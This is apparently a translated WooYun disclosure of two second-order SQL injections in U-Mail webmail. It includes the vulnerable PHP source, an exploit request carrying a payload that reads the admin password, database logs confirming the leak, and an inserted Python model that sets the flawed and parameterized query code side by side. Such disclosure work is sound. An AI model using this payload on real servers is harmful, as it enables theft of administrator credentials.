
Vulnerability Summary (69 followers)

Defect ID: WooYun-2016-172079

Title: Two SQL injections in the U-Mail mail system

Vendor: U-Mail

Author: Ano_Tom (Verified White Hat)

Submitted: 2016-01-25 09:42

Published: 2016-01-28 17:30

Vulnerability type:

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact help@wooyun.org

Tags: none



Vulnerability Details

Disclosure status:

2016-01-25: Details sent to the vendor, awaiting vendor handling
2016-01-29: Vendor confirmed; details disclosed to the vendor only
2016-02-01: Details opened to third-party security partners (绿盟科技, 唐朝安全巡航, 无声信息)
2016-03-24: Details opened to core white hats and domain experts
2016-04-03: Details opened to regular white hats
2016-04-13: Details opened to intern white hats
2016-01-28: Details disclosed to the public

Brief description:

:)

Detailed description:

U-Mail latest version V9.8.59

Environment: Windows 2003 + the latest version downloaded from the official site (the download page shows v9.8.57, whose last program update on 2015.03.26 fixed many vulnerabilities; after installation, version.txt in the web directory shows the actual version is v9.8.59).

As shown in the figure:

[Figure: c1.png]



The vulnerability was fixed improperly, leaving a SQL injection through which the administrator's password can be obtained.

The old version was analysed at http://**.**.**.**/bugs/wooyun-2015-093376. The new version fixed several SQL injections; to fix this second-order injection, a filter function was added at the profile-update step. The file that writes the data into the database, from the old version, is

/client/option/module/o_userinfo.php

The code is:

Code:
if ( ACTION == "userinfo" )
{
$url = make_link( "option", "view", "userinfo" );
$where = "UserID='".$user_id."'";
$data = array(
"FullName" => text_secure_filter( gss( $_POST['fullname'] ) ),   // blacklist filter applied here
"EnglishName" => text_secure_filter( gss( $_POST['englishname'] ) )
);
$result = $Mailbox->update_mailbox( $data, $where, 0 );   // writes FullName into userlist
if ( !$result )
{
redirect( $url, "修改姓名时出现错误,修改失败!" );
}
}



[Figure: c2.png]



Looking at the filter function

in /admin/include/base.func.php, the code is:

Code:
function text_secure_filter( $_obfuscate_VgKtFegÿ, $_obfuscate_2TiPwh70 = FALSE )
{
$_obfuscate_VgKtFegÿ = str_replace( "/*", "", $_obfuscate_VgKtFegÿ );
$_obfuscate_VgKtFegÿ = str_replace( "*/", "", $_obfuscate_VgKtFegÿ );
$_obfuscate_VgKtFegÿ = str_replace( "#", "", $_obfuscate_VgKtFegÿ );
if ( $_obfuscate_2TiPwh70 )
{
$_obfuscate_VgKtFegÿ = str_replace( "(", "", $_obfuscate_VgKtFegÿ );
$_obfuscate_VgKtFegÿ = str_replace( ")", "", $_obfuscate_VgKtFegÿ );
}
return $_obfuscate_VgKtFegÿ;
}



It strips MySQL's comment markers, which is clearly inadequate: a blacklist-style fix like this is easily bypassed. Here MySQL's -- comment marker is enough to bypass it; note that -- must be followed by a space.



Meanwhile the vulnerable file /client/oabshare/module/operates.php is unchanged; the filtering should be applied where this file reads the data back out of the database.

Code:
if ( ACTION == "save-to-pab" )
{
include_once( LIB_PATH."PAB.php" );
$PAB = PAB::getinstance( );
$maillist_id = gss( $_GET['maillist'] );
$maillist_id = intval( $maillist_id );
if ( $maillist_id )
{
$member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 );
if ( !$member_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $member_all as $member )
{
if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $member['FullName'],   // second-order injection: read from the DB, unfiltered
"pref_email" => $member['Mailbox'],
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );   // written into the DB via INSERT ... SET
if ( !$res )
{
dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );
}
}
}
}
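The data flow just described, as an added example that is not U-Mail's code: a Python/sqlite3 model of the report's blacklist filter and of the unescaped SET-clause builder beside a parameterized version. Table names come from the report; the toy schema, the sample admin hash, and the use of UPDATE ... SET in place of MySQL's INSERT ... SET (which SQLite lacks) are assumptions.

```python
import re
import sqlite3

# Constructed toy schema: table names and the columns seen in the report's log
# lines come from the page; everything else is an assumption.
SCHEMA = """
CREATE TABLE userlist (UserID INTEGER PRIMARY KEY, FullName TEXT, password TEXT);
CREATE TABLE pab_contact (contact_id INTEGER PRIMARY KEY, user_id INTEGER,
                          fullname TEXT, homepage TEXT, pref_email TEXT);
"""
# FullName as it sits in userlist after the first request (the UPDATE escaped the quote).
STORED_FULLNAME = "',`homepage`=(SELECT password from userlist where userid=2)-- -"

def text_secure_filter(s, strip_parens=False):
    """Port of the report's blacklist: removes /* */ and #, but not MySQL's '-- '."""
    for tok in ("/*", "*/", "#"):
        s = s.replace(tok, "")
    if strip_parens:
        s = s.replace("(", "").replace(")", "")
    return s

def set_clause_unescaped(data):
    """Vulnerable sink: values are quoted but never escaped or bound."""
    return ",".join("`%s`='%s'" % (k, v) for k, v in data.items())

def set_clause_bound(data):
    """Hardened sink: column names checked against a pattern, values bound as parameters."""
    for k in data:
        if not re.fullmatch(r"[A-Za-z_]\w*", k):
            raise ValueError("bad column name: %r" % k)
    return ",".join("`%s`=?" % k for k in data), list(data.values())

def setup():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO userlist VALUES (2, 'admin', 'S3cretAdminHash')")  # constructed
    conn.execute("INSERT INTO userlist VALUES (5, ?, 'userhash')", (STORED_FULLNAME,))
    conn.execute("INSERT INTO pab_contact VALUES (1, 5, '', '', 'whoami003@example.invalid')")
    return conn

def sync_contact(conn, contact_id, safe):
    """Second stage: copy FullName out of userlist into the address-book row
    (modelled as UPDATE ... SET; the SET-clause builder is the same either way)."""
    fullname = conn.execute("SELECT FullName FROM userlist WHERE UserID=5").fetchone()[0]
    data = {"fullname": fullname, "pref_email": "whoami003@example.invalid"}
    if safe:
        clause, params = set_clause_bound(data)
        conn.execute("UPDATE pab_contact SET %s WHERE contact_id=?" % clause, params + [contact_id])
    else:
        conn.execute("UPDATE pab_contact SET %s WHERE contact_id=%d" % (set_clause_unescaped(data), contact_id))
    return conn.execute("SELECT fullname, homepage FROM pab_contact WHERE contact_id=?", (contact_id,)).fetchone()
```

With `safe=False` the stored name rewrites the statement and the admin hash lands in `homepage`; with `safe=True` the same string is stored verbatim as the contact's name.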



Proof of vulnerability:

Exploitation:

After logging in to the mailbox, click "update personal profile":

[Figure: c4.png]



The request is:

Code:
POST /webmail/client/option/index.php?module=operate&action=userinfo&return=%2Fwebmail%2Fclient%2Foption%2Findex.php%3Fmodule%3Dview%26action%3Duserinfo HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 195
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/webmail/client/option/index.php?module=view&action=userinfo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: login=system%2Czh; PHPSESSID=92d69b792d29c6c15915ddd4bcc401a5
fullname=%27%2C%60homepage%60%3D%28SELECT+password+from+userlist+where+userid%3D2%29--+-+&englishname=&gender=0&bd_year=0000&bd_month=00&bd_day=00&mobile=&tel=&extnum=&im=&o_group=&worknum=&memo=



The SQL statements for the profile update:

Code:
160123  0:02:39	  623 Connect	umail@localhost on 
623 Query SET NAMES 'UTF8'
623 Init DB umail
623 Query UPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)-- -',`EnglishName`='' WHERE UserID='5'
623 Query UPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='5'
623 Quit



After updating the profile, obtain the user's userid and issue the request:

http://**.**.**.**/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=whoami003

[Figure: c5.png]



The SQL statements it executes, including the database insert, are:

Code:
160123  0:06:47	  629 Connect	umail@localhost on 
629 Query SET NAMES 'UTF8'
629 Init DB umail
629 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (5)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
629 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (5)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
629 Query SELECT contact_id FROM pab_contact WHERE user_id='5' AND pref_email='whoami003@**.**.**.**' LIMIT 1
629 Query INSERT INTO pab_contact SET `user_id`='5',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)-- -',`pref_email`='whoami003@**.**.**.**',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2016-01-23 00:06:47'
629 Quit



The administrator's password can then be viewed in the personal address book:

[Figure: c6.png]



II. Injection 2

The principle is similar: the file /client/oab/module/operates.php is also injectable. Earlier analysis: http://**.**.**.**/bugs/wooyun-2010-099221

Code:
if ( ACTION == "save-to-pab" )
{
include_once( LIB_PATH."PAB.php" );
$PAB = PAB::getinstance( );
$maillist_id = gss( $_GET['maillist'] );
if ( $maillist_id )
{
$member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 );
if ( !$member_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $member_all as $member )
{
if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $member['FullName'],
"pref_email" => $member['Mailbox'],
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );
if ( !$res )
{
dump_json( array(
"status" => FALSE,
"message" => el( "添加联系人时发生错误,添加失败!", "" )
) );
}
}
}
}
else
{
$user_ids = gss( $_GET['userlist'] );
$user_ids = id_list_filter( $user_ids );
if ( !$user_ids )
{
dump_msg( "param_error", el( "参数错误!", "" ) );
}
$where = "t1.UserID IN (".$user_ids.")";
$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );
$user_all = $arr_tmp['data'];
if ( !$user_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $user_all as $user )
{
$qq = $msn = "";
if ( strpos( $user['qqmsn'], "@" ) )
{
$msn = $user['qqmsn'];
}
else
{
$qq = $user['qqmsn'];
}
if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $user['FullName'],   // read out of the DB, unfiltered
"pref_email" => $user['email'],
"pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],
"birthday" => $user['birthday'],
"im_qq" => $qq,
"im_msn" => $msn,
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );   // written into the DB
if ( !$res )
{
dump_json( array(
"status" => FALSE,
"message" => el( "添加联系人时发生错误,添加失败!", "" )
) );
}
}
}
}
dump_json( array( "status" => TRUE, "message" => "" ) );
}

Remediation:

Gain a thorough understanding of MySQL comment syntax and of second-order injection. Filter.

Copyright notice: please credit Ano_Tom@乌云 when reposting


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-01-29 16:56

Vendor reply:

CNVD did not directly reproduce the described situation; CNVD has notified the software vendor through its previously established handling channels.

Latest status:

None yet



Comments

  1. 2016-01-25 09:47 | 玉林嘎 Verified White Hat ( Regular white hat | Rank: 933 | Vulns: 107 )
    0

    There's more...

  2. 2016-01-25 10:18 | 伤心的猫猫 ( Regular white hat | Rank: 115 | Vulns: 32 | @sangfor, @qq, @alibaba, @baidu )
    0

    Time to farm rank?...

  3. 2016-01-25 10:57 | sunnyf ( Intern white hat | Rank: 60 | Vulns: 8 )
    0

    Ugh, injection again

  4. 2016-01-25 12:10 | hkcs ( Intern white hat | Rank: 56 | Vulns: 9 | just passing by )
    0

    There are surely more

  5. 2016-01-25 15:06 | 岛云首席鉴黄师 ( Regular white hat | Rank: 467 | Vulns: 127 | icisaw.cn ultra-cheap VPS hosting, cashback on purchase... )
    0

    tangscan plugin +2

  6. 2016-01-27 04:34 | Arthur ( Intern white hat | Rank: 85 | Vulns: 35 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ )
    0

    I knew it....

  7. 2016-01-27 15:19 | 明月影 ( Passer-by | Rank: 12 | Vulns: 8 )
    0

    Years of umail. 666

  8. 2016-01-30 22:37 | watchdoge ( Passer-by | Rank: 14 | Vulns: 8 | web guy, pentest dog )
    0

    Focused on Umail for ten thousand years

  9. 2016-01-31 08:26 | AK-47 ( Intern white hat | Rank: 78 | Vulns: 11 | happily hunting bugs, diligently studying! )
    0

    Injected by you again

  10. 2016-02-16 09:57 | JoyChou ( Passer-by | Rank: 22 | Vulns: 6 | none )
    1

    666
